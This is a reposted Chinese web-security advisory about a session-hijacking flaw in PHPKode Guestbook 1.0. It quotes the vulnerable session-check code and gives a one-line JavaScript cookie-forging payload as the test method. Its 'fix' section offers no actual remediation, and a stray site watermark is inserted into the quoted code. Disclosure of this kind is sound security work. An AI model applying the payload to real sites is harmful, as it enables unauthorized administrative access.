PHPKode Guestbook 1.0 Session劫持缺陷及修复

PHPKode Guestbook 1.0 Session劫持缺陷及修复 - 网站安全

来源：自学PHP网时间：2015-04-17 14:47 作者：阅读:次

[导读] PHPKode Guestbook 1.0 Session Hijacking Vulnerability---------------------------------------------------------作者: bd0rk联系方式： bd0rk[at]hackermail.com www.2cto.comGreetz: Perle, Zub......

PHPKode Guestbook 1.0 Session Hijacking Vulnerability

---------------------------------------------------------
作者: bd0rk

联系方式： bd0rk[at]hackermail.com www.2cto.com

Greetz: Perle, Zubair Anjum, 1930-Team (Manu, Jenny, Manni & Conny)

测试平台 Ubuntu-Linux

影响软件版本: PHPKode Guestbook 1.0

软件开发者: http://www.phpkode.com

下载地址: http://www.phpkode.com/download/p/PHPKodeGuestbook_1.0.zip

«««««««««««««««««««««««««««««««««««««««««««««««««««««««««««««««««««««««««««««

kode_author.php页面缺陷代码分析:

@session_start();

function Logged() {
      if (isset($_SESSION['loggedid']) && isset($_SESSION['adminuser'])) {
          return TRUE;
      }
      else {
          return FALSE;
      }
}

function get_visitor_key() {
      www.2cto.com if (isset($_COOKIE["visitor_key"]) && !empty($_COOKIE["visitor_key"])) {
          $visitor_key = $_COOKIE["visitor_key"];
      }
      else {
          $visitor_key = "None";
      }
      return $visitor_key;
}

«««««««««««««««««««««««««««««««««««««««««««««««««««««««««««««««««««««««««««««

测试方法:

javascript.document.cookie = "loggedid=YmFzdXJhYWFhMTpvciAxPTFiYXJ1cmFhYWFhYQ==; path=/";

修复：
看上文分析

A2CMS源码泄露缺陷及修复 - 网站安全 - 自学php

Web服务器捉虫速记 - 网站安全 - 自学php

子栏目

PHPKode Guestbook 1.0 Session劫持缺陷及修复 - 网站安全

最新评论

添加评论

更多文章推荐

添加评论